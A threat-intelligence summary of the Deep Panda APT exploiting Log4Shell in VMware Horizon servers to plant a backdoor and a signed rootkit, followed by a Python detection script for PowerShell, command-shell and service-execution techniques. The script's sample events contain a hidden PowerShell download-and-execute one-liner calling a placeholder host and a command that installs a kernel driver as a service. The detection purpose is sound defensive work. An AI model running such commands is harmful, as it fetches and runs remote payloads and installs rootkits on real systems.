Deep Panda, a Chinese APT group, took advantage of the well-known Log4Shell vulnerability in VMware Horizon servers to deploy a backdoor, rootkit, and steal sensitive data. The attacks are carried out initially by exploiting Log4Shell (CVE-2021-44228) in vulnerable VMware Horizon servers. These attacks launched a new PowerShell process that downloaded and executed a series of scripts, culminating in the installation of a Milestone backdoor. Milestone is intended to send information on the current system sessions to the remote server. During the attacks, a kernel rootkit called "Fire Chili" was discovered that was digitally signed with stolen certificates from game development companies, allowing it to avoid detection by security software. This threat actor is primarily targeting firms in the finance, education, beauty, and tourist industries.

The MITRE TTPs commonly used by Deep Panda are:
T1059.001: Command and Scripting Interpreter: PowerShell
T1059.003: Command and Scripting Interpreter: Windows Command Shell
T1569.002: System Services: Service Execution
T1027.002: Obfuscated Files or Information: Software Packing

A recently analyzed Chinese cyber-espionage and financially-focused threat actor was observed targeting a web server at a U.S.-based research university.

GhostEmperor, a new Chinese cyber-espionage group, has been continuously attacking large organizations using Windows in Southeast Asia since at least July 2020.

For a detailed advisory, download the PDF file here.
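As an added detection example (not code from the advisory or from any vendor), the following classifies process-creation events against the three execution TTPs listed above: a PowerShell download chain or a command shell spawned from the Horizon web process, and service creation through the service control manager. The parent process names and the Sysmon-like event fields are assumptions; the sample events are constructed, not real telemetry.

```python
import re

# Assumed parent processes for a compromised VMware Horizon server (the Tomcat/Java
# process hosting the Log4j-using web app). These names are assumptions, not from the advisory.
WEB_PARENTS = {"ws_tomcatservice.exe", "java.exe", "tomcat9.exe"}

# Indicators of a PowerShell download-and-execute chain (T1059.001).
PS_DOWNLOAD = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression|\biex\b|"
    r"-enc(odedcommand)?\b|frombase64string", re.I)
# Service creation or start via the service control manager (T1569.002).
SVC_EXEC = re.compile(r"\bsc(\.exe)?\s+(create|start|config)\b|new-service|start-service", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the ATT&CK technique IDs a single process-creation event matches."""
    child, parent, cmd = basename(event["image"]), basename(event["parent_image"]), event["cmdline"]
    hits = []
    from_web = parent in WEB_PARENTS          # web server spawning a shell is the key signal
    if child == "powershell.exe" and (from_web or PS_DOWNLOAD.search(cmd)):
        hits.append("T1059.001")
    if child == "cmd.exe" and from_web:
        hits.append("T1059.003")
    if SVC_EXEC.search(cmd):
        hits.append("T1569.002")
    return hits

def scan(events):
    """Map each matching event index to its technique IDs; benign events are omitted."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}

# Constructed sample events in a Sysmon-like shape; none are real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
     "cmdline": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://EXAMPLE/stage1.ps1')"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
     "cmdline": "cmd.exe /c sc create svc binPath= C:\\ProgramData\\x.sys type= kernel && sc start svc"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell Get-Process"},
]

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(i, hits)
```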